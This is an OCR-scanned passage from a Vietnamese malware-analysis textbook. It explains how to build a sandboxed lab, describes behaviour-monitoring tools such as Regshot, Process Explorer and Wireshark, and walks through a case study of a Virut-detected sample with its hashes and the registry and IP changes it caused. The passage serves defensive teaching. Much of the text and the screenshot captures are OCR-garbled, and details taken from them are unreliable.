Cung câp thêm cho người dùng phân mêm quét bộ nhớ trên máy tính. 
Nó ngoài việc phân tích các file exe còn phân tích các file ảnh, 
cácđường dân URL, Registry, CLSID(CLSID là một sô 128 bit (lớn) 
đại diện cho một 1d duy nhât cho một ứng dụng phân mêm hoặc các 
thành phân ứng dụng). 

Nó cung cap nơi dé mọi người chia sẻ vé mã độc hại. 


5.2 Kỹ thuật phân tích hành vi sử dụng môi trường máy ảo 
Như vậy có thé thay 2 bước đầu tiên trong phan trên là 2 bước sơ 
bộ và phân tích mã độc hại bằng cách theo dõi hành vi của chúng. Đây là 


hai bước chủ yếu giáo trình tập trung trình bảy. 
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Dé có thé phan tích được mã độc hai sử dung phương pháp quan 
sát hành vì bản thân người phân tích cần phải có 1 môi trường hệ thong 
phân tích với các công cụ cần thiết. 

Chuẩn bị một hệ thống lab như sau : 


Chuẩn bị 2 máy : 


- Mot máy dé gia lập môi trường Internet 
- Mot máy đê cho mã độc hai chạy trên đó. 

Máy để cho mã độc hại chạy trên đó có thé sử dụng công nghệ 
máy ảo dé người phân tích luôn có 1 máy ở tình trạng mới nhất dé chạy 
mã độc hại. Hoặc cũng có thé máy thật, nhưng qua trình trở về trạng thái 
mới nhất thì mất nhiều thời gian hơn so với máy ảo. Tuy nhiên có rất 
nhiều mã độc hại có thể nhận biết được môi trường máy ảo, ví dụ như 
mã độc hại Red Pill có thé tự nhận dạng được môi trường ảo dé không 
chạy trên môi trường đó, chi tiết có thé xem thêm ở đây: 

http://invisblethings.org/papers/redpill.html 
Nên tùy vào nhu cầu người phân tích cần lựa chọn sao cho phù hop. 

Máy ảo xây dựng chạy Windows XP SP2, Windows Server 2003, 
SP2, Windows 7 Untilmate. 

Giả lập Internet bằng phần mềm Inetsim cài trên máy Linux server 
giả lập các dich vụ Internet như DNS, Webserver, IRC server, SMTP 


server... 


184 


Web server 
IRC server 
SMTP server 


Hình 5-8: Mô hình thực nghiệm 


Trên máy chạy mã độc hại thì cai san các công cụ phân tích mã độc hại : 


Sysanalyzer 

Process Explorer 
Regshot 

TCPView 

Wireshark 

Svchost Process Analyzer 
HijackThis 

Autoruns 


5.2.1 Sysanalyzer 
http://securitytnt.com/sysanalyzer/ 


ee 99 C:\iDEFENSE\SysAnalyzerssysAnalyze BB. ... | 
Delay [secs] | 5| 


Options 


Ni Use SniffHit 


[d Use Api Logger 


Nl Use Directory Watcher 


Hinh 5-9: Sysanalyzer 
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La một ứng dung chạy thời gian thực tự động phân tích mã độc 
hại sinh các log về các khía cạnh khác nhau của hệ thống, các tiễn trình 
xảy ra. Nó được thiết kế để cho phép nhanh chóng sinh ra báo cáo toàn 
diện về hành vi của mã độc hại lên hệ thống. 

SysAnalyzer tự động có thé theo dõi và so sánh: 


- Các tién trình dang chay. 

- Các công dich vụ đang mở. 

- Các drivers của hệ thông dang được dùng. 

- Cac thư viện được thêm vào hệ thống. 

- Các giá tri registry bị thay đổi. 

- Cac ham API được gọi ra bởi mã độc hai. 

- Cac file trong hệ thống bị sửa đồi. 

- Thông tin vé các luồng traffic HTTP, IRC, DNS. 


5.2.2 Process Explorer 
http://technet.microsoft.com/en-us/sysinternals/bb896653 


JW Process Explorer - Sysinternals: www.sysinternals.com [KHANGKITO-PC\KHANGKITO] Cs tells) 
File Options View Process Find DLL Users Help 


a| äise OS zz 1 ép d —— 8 — EH 3H —— 5 na ` —— $ 3 


Process PID CPU Private Bytes Working Set Description Compan ^ 
m ]esrs.exe 428 0.67 8.288K 12.324 K 
Z| winlogon exe 624 1.688 K 904 K 
E) L explorer.exe 2080 3.25 50.972 K 37.696 K Windows Explorer Microsoft 
zi jm]swchost.exe 2352 0.36 2.184 K 3.464 K Host Process for Windows S... Microsoft 
ED vmware+tray exe 2396 1072K 596 K VMware Tray Process VMware. 
[wr] WINWORD.EXE 1916 «0.01 36.788 K 56.780 K Microsoft Word Microsoft 
2] 
E [m7] 
Snipping Tool.exe 2440 1.34 1.744 K 6.264 K Snipping Tool Microsoft | 
= @ IDMan.exe 2376 7.032 K 1.020 K Intemet Download Manager ... Tonec E E 
es IEMonitor exe 2772 1.564 K 2.652 K Intemet Download Manager ... Tonec Ìnc_ 
GAP UniKeyNT.exe 2424 1.204 K 372K 
Gi (= YahooMessenger.exe 2432 0.19 93.468 K 25.928 K Yahoo! Messenger Yahoo! In 
exe 3372 <001 22.752 K 2.160 K Yahoo! Messenger Yahoo! In 
m |svchost exe 2848 0.04 2.088 K 2492 K ~ 
= Jgame.exe Z0 ———————— ; 
Name = Description Company Name Version = 
advapi32 dll Advanced Windows 32 Base API Microsoft Corporation 6.1.7600.16385 | = | 
apisetschema dil ApiSet Schema DLL Microsoft Corporation 6.1.7600.16385 
apphelp dil Application Compatibility Client Libr... Microsoft Corporation 6.1.7600.16385 
C 1252.NLS 
cfgmgr32 dll Configuration Manager DLL Microsoft Corporation 6.1.7600.16385 
cibcatq dii COM Configuration Catalog Microsoft Corporation 2001.12.8530.16... 
comcti32 dli User Experience Controls Library Microsoft Corporation 6.10.7600.16385 
comdig32 dil Common Dialogs DLL Microsoft Corporation 6.1.7600.16385 
ion VVizard.dll Connection Wizard Yahoo! Inc. 1.0.0.55705 
core video .dll core video Yahoo! Inc. 1.0.0.55705 
crypt32 dli Crypto API32 Microsoft Corporation 6.1.7600.16385 
cryptbase dil Base cryptographic API DLL Microsoft Corporation 6.1.7600.16385 
cryptsp dil Cryptographic Service Provider API Microsoft Corporation 6.1.7600.16385 
d3d8thk.dil Microsoft Direct3D OS Thunk Layer Microsoft Corporation 6.1.7600.16385 
d3d9.dil Direct3D 9 Runtime Microsoft Corporation 6.1.7600.16385 
dciman32 dll DCI Manager Microsoft Corporation 6.1.7600.16385 Gë 


CPU Usage: 34.74% Commit Charge: 66.26% Processes: 63 Physical Usage: 92.42% 


Hinh 5-10: Process Explorer 
Proces Explorer là phan mém mién phí cho Microsoft Windows 


do Sysinternals tao ra, và duoc tap doàn Microsoft mua lai. 
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Process Explorer là tiện ich theo dõi và kiểm tra hệ thống, có thé 
sử dụng như một công cụ gỡ rối cho các phần mềm cũng như các vấn đề 
phát sinh của hệ thống. Có thể dùng như một tiện ích thay thế task 
manager của Windows. 

Process Explorer có thé được sử dụng dé theo dõi về các van dé. Ví dụ 
như, xem tiến trình nào đang chạy, theo dõi những tệp tin đang được mở 
bởi các chương trình, hiện dòng lệnh đã được sử dụng để khởi động 
chương trình. 

Process Explorer hiến thi cho bạn thông tin các về các tiến trình, xử lý 
DLLs. Nó gồm 2 cửa số, cửa số trên cùng thì thé hiện danh sách các tién 
trình đang hoạt động, bao gồm tên của chúng va tài khoản chạy chung. 
Trong khi các thông tin hiển thị trong cửa số phía dưới phụ thuộc vào 
chế độ mà Process Explorer đang chạy. Nếu process Explorer chạy trong 
chế độ dll mode thì bạn sẽ thấy dlls và memory-mapped files trong tiễn 
trình được tai. 

Đây cũng là một công cụ khá mạnh nhanh chóng giúp bạn nhanh 
chóng tìm kiếm xem được các tiến trinh cụ thé và các file dll twong ứng 
đang chạy. Nó có khả năng xem xét các van đề về phiên ban dl cũ, cung 
cấp cái nhìn rõ về cách windows và ứng dụng làm việc. 

Nó cũng được dùng như Task Manager để quản lý tài khoản từng 
chương trình chiếm dụng, thiết lập mức độ ưu tiên của từng tiễn trình... 

Hiện nay Process Explorer làm việc trên Windows 
9x/Me, Windows NT 4.0, Windows 2000, Windows XP, Windows 
Server 2003, Windows Vista, Windows 7 bao gom ca cac phién ban 64 
bit. 

5.2.3 Regshot 

Regshot là mót tién ích nhó dé ban so sánh thóng tin vé registry 

giữa lần trước khi chạy mã độc hại và sau khi chạy mã độc hại. Nó sẽ ghi 


lại những thông tin nảo bị thay đổi và thay đổi thế nào. 


http://sourceforge.net/projects/regshot/ 
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m'| Regshot 1.8.2 


Compare logs sawe as: 
Plain "TS" C^ AML document 


[ Scan dir 1[;clir2;...;clir mn]: 


| C:\Windows 


Output path: Quit 
| CrWsers'\KHANGK~L\VAppD: ` | ERES | 


Add comment into the log: 


| [English E 


Hinh 5-11: Regshot 


Ist shot: Chup Registry ở lần thứ 1 (chụp trước khi cài đặt mã độc hại hoặc 
có sự thay đôi trên hệ thông). 

Plain TXT: Bản báo cáo so sánh kết quả chụp Registry xuất ra dạng TEXT. 
HTML document: Bản báo cáo so sánh kết quả chụp Registry xuất ra dạng 
HTML. 

Scan dirl[ ; dir2 ;... ; dir nn ]: Chon thư mục muốn chụp, mặc định 
là CAWINDOWS. Nếu chọn thêm thì cách nhau bởi dấu ":". Ó trên là 
C:\Users\KHANGK~1\AppData\Local\Temp\ 

Output path: Duong dẫn chứa ban báo cáo so sánh kết quà chụp Registry. 
Đề chụp lần thứ 1, ta click vào nút 1st shot và có 3 lựa chọn: 


Shot: Thực hiện chụp Registry ngay. 

Shot and Save: Chup Registry và lưu lại lần chụp này thành 1 tập tin với 
phần mở rộng .hiv. 

Load...: mở ra tập tin .hiv (đã chụp ở thời điểm nào đó trước đó). 

Sau khi hệ thống có sự thay đôi, hoặc mới cài đặt phần mềm... ta sẽ thực 
hiện lần chụp thứ 2, và cũng sẽ có 3 lựa chọn như giai đoạn trên. 

Sau khi lần chụp thứ 2 được thực hiện, click chọn nút compare để xem 
kết quả. 

5.2.4 HijackThis 

HijackThis là một tiện ích miễn phi dùng dé quét những thay đôi 
của Windows do Spyware, Malware, hoặc những chương trình lạ một 
cách nhanh chóng và chính xác. 

HijackThis sẽ tạo ra các file log chứa những kết quả của việc quét 
một cách rất rõ ràng, dựa vào các log file đó ta có thé phân tích, tìm ra 
hướng giả quyết một cách rõ ràng. 
http://www.spywareinfo.com/~merijn/files/hijackthis.zip 
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Below are the results of the HijackThis scan. Be careful what you delete with the ‘Fix 
checked’ button. Scan results do not determine whether an item is bad or not. The 
best thing to do is to 'AnalyzeThis' and show the log file to knowledgeable folks. 


WIR 1 -HKCUNSoftware Microsoft\Internet Explorer Main, Search Page = http: //go.microsoft.com/fwlink/?LinkId = S» 
CIRO - HKCU'Software Microsoft \Internet Explorer Main,Start Page = http: //go.microsoft.com/fwlink/?LinkId 269| 
E_1R1 - HKLM\Software\Microsoft\Internet Explorer Main,Default Page URL = http://go.microsoft.com/fwiink/?Lir 

E_1R1 - HKLM\Software\Microsoft\Internet Explorer Main,Default Search URL = http://go.microsoft.com/fwlink /?l 

[ ]R1 - HKLM'Software \Microsoft\Internet Explorer Main, Search Page = http: //go.microsoft.com/fwlink/?LinkId =£ 
[ JRO - HKLM \Software MicrosoftUnternet Explorer \Main,Start Page = http: //go.microsoft.com/fwlink/?LinkId 269 

IRO - HKLM'Software WMicrosoft\Internet Explorer Search, SearchAssistant = 

IRO - HKLM\Software \Microsoft\Internet Explorer \Search,CustomizeSearch = 

]RO - HKCU \Software'\Microsoft\Internet Explorer \Toolbar ,LinksFolderName = 
[ JR3 - URLSearchHook: Device VM Url Search Hook - {0063BF63-BFFF-488F-9D 26-426 7DF7F 17DD} - C: Windows 
 ]O2 - BHO: IDM Helper - (0055C089-8582-441B-AOBF-17B458C2A3A8) - C: Program Files\Internet Download M 
[ 1O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B5 1-7695ECA05670} - (no file) 
[ 1O2 - BHO: SSVHelper Class - {76 1497BB-D6F0-46 2C-B6EB-D4DAF 1D92D43} - C:\Program Files \Java\jre1.5.0_" 
—]G2 - BHO: URLRedirectionBHO - (B4F3A835-0E21-4959-BA22-4283008E02FF) - C: \PROGRA~1\MICROS~1\0f 
| O4 - HKLM\..\Run: [vmware-tray] "C:\Program Files\WMware \WMware Workstation \vmware-tray.exe™ 

104 - HKCU\..\Run: [IDMan] C:\Program Files\Internet Download Manager \IDMan.exe /onboot 
[ ]O4 - HKCU\.. Run: [Messenger (Yahoo!)] "C:\PROGRA~1\Yahoo! Messenger \YahooMessenger.exe™ -quiet 

[ ]O4 -HKCU\,..\Run: [Unikey] D:\Software \UniKeyNT.exe 

[ ]OS8 -Extra context menu item: Download all links with IDM - C:\Program Files\Internet Download Manager \IEGe 

[ ]O8 -Extra context menu item: Download FLV video content with IDM - C:\Program Files\Internet Download Mai 

[ ]O8 -Extra context menu item: Download with IDM - C:\Program Files\Internet Download Manager \IEExt.htm 
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C: PROGRA~1\MICROS~1\0Office 14\EXCEL.E ~ 


r- Other stuff 
nme = Info... | Config... | 
Main M | Add checked to ignorelist | 


m 


Hinh 5-12: HijackThis 
5.2.5 TCP View 
TCPView là một chương trình cho phép bạn nhìn thay các kết nối TCP 
và UDP trên máy bạn. Nó thé hiện ca địa chỉ cục bộ chính máy bạn và cả 
các địa chỉ ip khác, ngoài ra còn có thông tin về trang thái kết nối TCP. 
Cách sử dụng TCPVIew: 


- Khi bạn khởi động TCPView sẽ hiển thị toàn bộ các kết nói TCP, UDP. 

- Theo mặc dinh TCPView update mỗi giây một làn, nhưng bạn có thé sử 
dung Options Refresh Rate dé thay đổi. Ban có thé đồng kết nói ở trang 
thái Established bằng cách lựa chọn File Close connection. Bạn cũng có 
thé ghi lại thông tin các kết nói thành các báo cáo dưới dang các log file 
để phân tích. 

- TCPView còn bao gồm bản Tcpvcon, một phiên bản dòng lệnh với các 
chức năng tương tự. 


http://technet.microsoft.com/en-us/sysinternals/bb897437 
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lu TCPView - Sysinternals: www.sysinternals.com L= ]LEn |L3 ] 
File Options Process View Help 


| ld * = A 


Process 7 Local Address Local Port 


© chrome.exe 192.168.1.90 34982 
© chrome.exe 192.168.1.90 34983 
© chrome.exe 192.168.1.90 34984 
© chrome.exe 192.168.1.90 34986 
© chrome.exe 192.168.1.90 

© chrome.exe 192.168.1.90 34988 
© chrome.exe 192.168.1.90 34989 
© chrome.exe 192.168.1.90 34990 
© chrome.exe 192.168.1.90 

© chrome.exe 192.168.1.90 34992 
© chrome.exe 192.168.1.90 34994 
© chrome.exe 192.168.1.90 34996 
© chrome.exe 192.168.1.90 34999 
© chrome.exe 192.168.1.90 

© chrome.exe 192.168.1.90 35004 
© chrome.exe 192.168.1.90 35005 
© chrome.exe 192.168.1.90 35006 
© chrome.exe 192.168.1.90 

© chrome.exe 192.168.1.90 

© chrome.exe 192.168.1.90 

© chrome.exe 192.168.1.90 

© chrome.exe 192.168.1.90 

& game.exe 192.168.1.90 

Ki 

| 


Endpoints: 137 Established: 51 Listening: 29 Time Wait: 3 Close Wait: 0 


Hinh 5-13: TCPView 


5.2.6 Wireshark 

Wireshark Là chương trình bát gói tin nói tiếng dé ta có thé nam 
được hành động của malware. Xem được các kết nối của nó ra ngoài như 
thế nào. 

Wireshark hỗ trợ với nhiều giao thức khác nhau, nó được phát 
triển trên mô hinh mã nguồn mở nén sẽ thêm vào những giao thức mới. 

Nó là công cụ miễn phí và dễ dùng nhất đối với mọi người và nó 
hỗ trợ hầu hết các hệ diéu hành. 


http://www.wireshark.org/download.html 
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E Capturing from Realtek RTL8168C/8111C PCI-E Gigabit Ethernet NIC - Wireshark [e lm |[ s ] 
File Edit View Go Capture Analyze Statistics Telephony Tools Help 


EN ü e Gi GÍ ea 3€ G3 hl 4 c e zz 2 (EIEI c «rab. > 

Filter: ~ Expression... Clear Apply 

No. Time Source Destination Protocol Info a 
1260 26.015361 120.138. ep Les 192.168.1.90 TCP x11 > ca-web-update [PSH, AC 
1261 26.015702 120.138. es es 192.168.1.90 TCP x11 > 14400 [PSH, ACK] Seq=2 


1262 26.021194 120.138.65.165 192.168.1.90 TCP x11 > 12650 [PSH, ACK] Seq=2 


1265 26.042874 120.138. 65.165 192.168.11.90 x11 > 12650 [ACK] Seq=26441 


1266 26.085006 120.138.65.165 192.168.11.90 x11 > 14400 [ACK] Seq=29904 


1269 26.105839 120.138. 65.165 192.168.11.90 x11 > 14400 [ACK] Seq=29904 

1270 26.119975 120.138.65.165 192.168.1.90 Tee x11 > ca-web-update [ACK] se 
1271 26.237868 120.138.65.165 192.168.1.90 HLS x x11 > 14400 [PSH, ACK] Seq=2 
1272 26.240810 120.138.65.165 192.168.1.90 TCP x11 > ca-web-update [PSH, AC 
1273 26.240974 120.138.65.165 192.168.1.90 TCP x11 > 12650 [PSH, ACK] Seq=2 


Pt 274 20.435200 192-168-190 m20 128.565.169 0 ce 14400 > xii (ACK) Seq-1800 AR 
4 w Ls 
tj Frame 1: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) 
@ Ethernet II, src: Giga-Byt 11:82:7d (00:24:1d:11:82:7d), DSt: Netgear ed:e6:di1 (00:26:f2:ed 
*j Transmission control Protocol, src Port: 14400 (14400), DSt Port: x11 (6042), Seq: 1, Ack 


tr r 


OOOO OO 26 f2 ed e6 di OO 24 1d 11 82 7d O8 OO 45 OO .&..... $ ...†..E. 
OO10 OO 28 4d fa 40 OO 80 O6 OO OO cO a8 O1 5a 78 8a SS VL. icu s zx. 
OO20 41 a5 38 40 17 9a 96 89 5c dc c3 49 1c ea 50 10 A-88. --. X-.E--- 
OO3O f7 Od 7c 4c OO O Ie 

@ | Realtek RTL8168C/8111C PCI-E Gigabit Ether... | Packets: 1274 Displayed: 1274 Marked: 0 Profile: Default 


Hinh 5-14: Wireshark 
5.2.7 Svchost Process Analyzer 


Svchost.exe là một tién trình quan trọng trong Windows, nó chịu 
trách nhiệm chạy và load các thư viện liên kết động ( dlls ) dé khởi động 
các dịch vụ cần thiết cho hệ thống. Thông thường thì file svchost.exe 
nằm trong thư mục C.\Windows\System32, nhưng có rất nhiều mã độc 
hại sử dụng cùng tên file và cùng tên tiến trình svchost.exe dé án đi hoạt 
động của chúng. 

Chương trình này sẽ liệt kết toàn bộ các thể hiện của tiến trình 
svchost.exe và kiểm tra các dịch vụ mà nó nắm dữ xem cho chính xác 


không. Day là một phần mềm tự do http://209.68.25.184/free/svchost- 
analyzer/index.html 
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Svchost Process Analyzer - www.neuber.com 


#%* svchost details 


Click on one of the 15 svchost processes in the above list to see all containing services of this svchost process in the bottom list 


Following svchost processes are running on your computer: 


Process ID File Group Services > 
ÆN svchost exe 2352 C-:\windows\system\svchost exe « No Microsoft fil... o E 
Æ svchost exe 2848 < Access is denied. Run program as Administrator! > < No Microsoft fil... o 

WA svchost.exe 860 C:\Windows \system32\svchost exe netsvcs 16 

uL svchost exe 832 C-:\Windows\System32\svchost exe LocalSystemNet... 3 

UL svchost.exe 792 C:\Windows\System32\svchost exe LocalService Net... 6 

al svchost.exe 1424 C:\Windows\system32\svchost exe LocalServiceNo... 3 

WA svchost.exe 1120 C:\Windows \system32\svchost.exe Network Service 5 = 

Display Name Service Name File Status 

Æ WinHTTP Web Proxy Auto-Disc... WinHttpAutoPro... winhttp.dil - The system cannot find the file specified deactive 

AX TCP⁄IP NetBIOS Helper imhosts < Registry Access is denied. Run program as Administrat... active 

Æ Network Location Awareness NiaSvc < Registry Access is denied. Run program as Administrat... active 

A Network Store Interface Service nsi < Registry Access is denied. Run program as Administrat... active 

+ | "n ] r 
ÆN means atypical. Check it with Security Task Manager. 

do means t belongs to Windows (a Microsoft fle) LG 


Hinh 5-15: Svchost Process Analyzer 


5.2.8 Autoruns 
http://technet.microsoft.com/en-us/sysinternals/bb963902 


AutoRuns sẽ giúp ban quan lí một cách toàn diện các vi tri mà các 
chương trình khởi động cùng với Windows, đưa cho bạn toàn quyền xử lí 
chúng. Autoruns liệt kê cho bạn rất chi tiết những thông tin về các chương 
trình đó, sắp xếp chúng theo các phân mục như Registry Key, Logon, 
Explorer, Services, Schedule Tasks, Winsocks... Ngoài tên và vi trí của 
chương trình, ban còn có thé xem từng module DLL mà chương trình nap 
vào bộ nhớ. 

Với chức năng đó, Autoruns có thể giúp bạn phát hiện những virus, 
trojan hay spyware có hại năm án mình trong máy tính hoặc bạn cũng có 
thé dùng Autoruns dé tắt bớt những chương trình không cần thiết khi khởi 
động. 


Dé xóa bỏ một chương trình trong danh sách, không cho nó khởi động 
cùng Windows, bạn chỉ đơn giản bỏ đánh dấu tương ứng của nó là được. 
Muốn xem thêm thông tin chi tiết hơn hãy nhấn vào nút Properties trên 
thanh công cụ. 
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File Entry Options Help 


il i£) aa id zw S 
KO Codecs | [77] Boot Execute | [=] Image Hijacks | /*5| Applnit | |) KnownDLLs | a MWinlogon 
SS Winsock Providers | Cx» Print Monitors | * LSA, Providers P Lu Network Providers | E Sidebar Gadgets 
& Everything ash, Logon L d Explorer | e Internet Explorer r=) Scheduled Tasks | 8» Services =1 Drivers 
Autorun Entry Description Publisher = 
ay HKLM\SOFTWAREMMicroso ft\Windows\CurrentVersion\Run E 
TA e vmware-tray VMware Tray Process (Verified) VMware, Inc. 
e HKCU\Software\WMicroso ft\Windows\CurrentVersion\Run 
v Kä IDMan Internet Download Manager (IDM) (Not verified) Tonec Inc. 
vi So Messenger (Y... Yahoo! Messenger (Verified) Y ahoo! Inc. 
| GE UniKey 
gj HKLM\SOFTWARE\Classes\Protocols\Filter 
Cé {| text/xml Microsoft Office XML MIME Filter (Verified) Microsoft Corporation 
gj HKLM\SOFTWARE\Classes\Protocols\Handler ~ 
< "n Lé 


Ready. 


Hinh 5-16 Autoruns 

5.3 Các bước phân tích trong kỹ thuật quan sat hành vi 

BI. Đầu tiên là bật chương trình Process Explorer. 

B2. Bật chương trình bắt gói tin wireshark. 

B3. Khởi động chương trình SysAnalyzer. 

B4. Khởi động chương trình Regshot và chạy lấy thông tin registry 
hiện thời của hệ thống lần đầu tiên. 

B5. Load mã độc hại vào chương trình Sysanalyzer để chạy mã độc 
hại. 

B6. Chạy tiếp chương trình Regshot dé so sánh thông tin registry đã 
thay đổi những gì ? 

B7. Kiểm tra chương trình Process Explorer, Svchost Process 
Analyzer. 

B8. Kiểu tra chương trình Wireshark va TCPView dé xem các thông 
tin về kết nối. 

Sau toàn bộ các bước trên chúng ta sẽ thu được những thông tin về 
hành vi của mã độc hại như sau : 

Về thuộc tính của mã độc hại : 

Tên mã độc hại, kích thước, kiêu mã độc hai (virus, trojan, worm ) 
tem thời gian. 

Thông tin vé checksum (MD5, SHA1). 
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Về hành vi của ma độc hại : 
Nó đã làm gi trên hệ thống thông qua kết quả của các report và 
những gi ta đã quan sát được. 
5.4 Phân tích một trường hợp cụ thể 
Phân tích mẫu 10M-109.EXE 


File name: 10M-109.EXE 

Submission date: 2011-10-05 22:19:41 (UTC) 
Current status: finished 

Result: 36 /43 (83.7%) 
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Antivirus 
AhnLab-V3 
AntiVir 
Antiy-AVL 
Avast 

AVG 
BitDefender 
ByteHero 
CAT-QuickHeal 
ClamAV 
Commtouch 
Comodo 
DrWeb 
Emsisoft 
eSafe 
eTrust-Vet 
F-Prot 
F-Secure 
Fortinet 
GData 
Ikarus 
Jiangmin 
K7AntiVirus 
Kaspersky 
McAfee 
McAfee-GW-Edition 
Microsoft 


NOD32 


Rising 

Sophos 
SUPERAntiSpyware 
Symantec 

TheHacker 

TrendMicro 
TrendMicro-HouseCall 
VBA32 


Version 
2011.10.05.00 
7.11.15.135 
2.0.3.7 
6.0.1289.0 
10.0.0.1190 
7.2 

1.0.0.1 
11.00 
0.97.0.0 
5.3.2.6 
10356 
5.0.2.03300 
5.1.0.11 
7.0.17.0 
36.1.8599 
4.6.2.117 
9.0.16440.0 
4.3.370.0 

22 
T3.1.1.107.0 
13.0.900 
9.114.5245 
9.0.0.837 
5.400.0.1158 
2010.1D 
1.7702 

6520 

6.07.11 
2011-10-05.01 
10.0.3.5 
8.0.0.5 

3.0 
23.77.04.01 
4.69.0 
4.40.0.1006 
20111.2.0.82 
6.7.0.1.317 
9.500.0.1008 
9.500.0.1008 
3.12.16.4 


Last Update 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.06 
2011.09.23 
2011.10.05 
2011.10.06 
2011.10.05 
2011.10.06 
2011.10.06 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.06 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.06 
2011.09.30 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.05 
2011.10.06 
2011.10.05 
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Result 

Win32/Virut.F 
W32/Virut.Gen 
Win32:Vitro 
Win32/Virut 
Win32.Virtob.Gen.12 
Trojan.Win32.Heur.087 
W32.Virut.G 


W32/Virut.E.gen!Eldorado 


Virus.Win32.Virut.CE 
Win32.Virut.56 
Virus.Win32.Virut! TK 


Win32/Virut.17408 


W32/Virut.E.gen!Eldorado 


Win32.Virtob.Gen.12 
W32/Virut.CE 
Win32.Virtob.Gen.12 
Virus.Win32.Virut 
Win32/Generic.a 
Virus 
Virus.Win32.Virut.ce 


W32/Virut.n.gen 


Heuristic.LooksLike.Win32.Suspicious.C 


Virus:Win32/Virut.BN 
Win32/Virut.NBP 
W32/Virut.HL 
W32/Sality.AO 
Malware.Virut 
Win32.Virut.di 
W32/Scribble-B 


W32.Virut.CF 
PE VIRUX.O 
PE VIRUX.O 


Virus.Win32.Virut.X5 


VIPRE 10670 2011.10.05 Virus.Win32.Virut.ce.5 (v) 


ViRobot 2011.10.5.4703 2011.10.05 Win32.Virut.AM 
VirusBuster 14.0.250.0 2011.10.05 Win32.Virut.AB.Gen 
Additional information 


MD5  : cf3fe61e836933c36a4db61d2518638c 
SHA1 : 8c874b666c2da02ecaf0f42d84c6046278253562 
SHA256: cf8a5a3ae301ff85e3eaeb71cf36f97097f93e3f815c6dc7c966d06ac07cdba9 


ssdeep: 6144:qLED6ZAluCwIleXSQynFFGkyplIkAwleRf9zkBg2mHOWzOdhckpaH1vGCl:q4C1CwIleCQ 
MFGkyIkg9-cegSX1vG 


File size : 335360 bytes 

Tiếp theo người phân tích tién hành khởi động regshot, ProcessExplorer, 
HijackThis, Wireshark lên. Người phân tích tiến hành “Shot” Regshot 
trước khi chạy 10M-109.EXE. Sau đó tiến hành chạy file 10M-109.EXE. 
Sau khi chạy thì xuất hiện một bảng 


PPP PP PP? 


[http 4 


Nguoi phán tích tiép tuc tién hành phan tích và xuát ra các log file 
cua Reshot và HijackThis. 

Log của HijackThí thì chỉ có dòng *CA/0M-109. EXE" là đáng 
chu y 

Log của Regshot thi có nhiều thứ hon 
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Show all 


“HK U\S-1-5-21-1454471165-790525478-682003330- 
500\Software\Microsoft\Windows\CurrentVersion\Explorer\ComD1g32\OpenSave 
MRU\log\MRUList: "a" 

HKU\S-1-5-21-1454471165-790525478-682003330- 
500\Software\Microsoft\Windows\CurrentVersion\Explorer\ComD1g32\OpenSave 
MRU\wmala: "C:\Documents and Settings\All Users\Documents\My Music\Sample 
Music\Beethoven's Symphony No. 9 (Scherzo).wma" 
HKU\S-1-5-21-1454471165-790525478-682003330- 
500\Software\Microsoft\Windows\CurrentVersion\Explorer\ComD1g32\OpenSave 
MRU\wma\MRUList: "a" 

HKU\S-1-5-21-1454471165-790525478-682003330- 
500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenW1 
thList\a: "I0M-109.EXE” 

HKU\S-1-5-21-1454471165-790525478-682003330- 
500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.wma\OpenWi1 
thList\MRUList: "a" 

HKU\S-1-5-21-1454471165-790525478-682003330- 
500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.log\Open Wit 
hList\a: "NOTEPAD.EXE" 

HKU\S-1-5-21-1454471165-790525478-682003330- 
500\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.log\OpenWit 
hList\MRUList: "a"” 

Va dac biét 1a: 

“HKLM\S YSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{470C4D2 
1-E2AC-46D6-A93C-4AC84E2 19400 }\DhcpNameServer: "192.168.245.2" 
HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{470C4D21 
-E2AC-46D6-A93C-4AC84E219400 }\DhcpNameServer: "192.168.91.2" 
HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{470C4D21 
-E2AC-46D6-A93C-4AC84E219400}\DhcpDefaultGateway: '192.168.245.2' 
HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{470C4D21 
-E2AC-46D6-A93C-4AC84E2 19400 }\DhcpDefaultGateway: '192.168.91.2' 
HKLM\SYSTEM\ControlSet001\Services\{470C4D21-E2AC-46D6-A93C- 
4AC84E219400 }\Parameters\Tcpip\DhcpIPAddress: "192.168.245.128" 
HKLM\SYSTEM\ControlSet001\Services\{470C4D21-E2AC-46D6-A93C- 
4AC84E219400 }\Parameters\Tcpip\DhcpIPAddress: "192.168.91.130" 
HKLM\SYSTEM\ControlSet001\Services\{470C4D21-E2AC-46D6-A93C- 
4AC84E219400 }\Parameters\Tcpip\DhcpServer: "192.168.245.254" 
HKLM\SYSTEM\ControlSet001\Services\{470C4D21-E2AC-46D6-A93C- 
4AC84E219400 }\Parameters\Tcpip\DhcpServer: "192.168.91.254"” 


Quan sát may dong log trên thay dường như Dia chi IP va Default 
Gateway cua may tinh da bi đôi, Người phân tích bật cửa số cmd lên dé 
kiểm tra IP của máy và đúng như dự đoán địa chỉ IP của máy tính đã bị 


đôi. 
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thernet adapter Local Area Connection: 


Connection-specific DNS Suffix . : localdomain 

IP Address. . a s . ee e ees o E 192.168.91.130 
Subnet Mask . = =» s ‹. « «© «© o s « = 255.255.255 .8 
Default Gateway . . . . . . . . . = 192.168.91.2 


IP trước khi chạy 10M-109.EXE là 


Ethernet adapter Local Area Connection: 


Connection-specific DNS Suffix . : localdomain 
IP fiddress. . . : ss . . » » » » * 192.168.245 
Subnet Mask . . w/ aw. E E ES. 
Default Gateway . e ee ce = 122.158.245. 


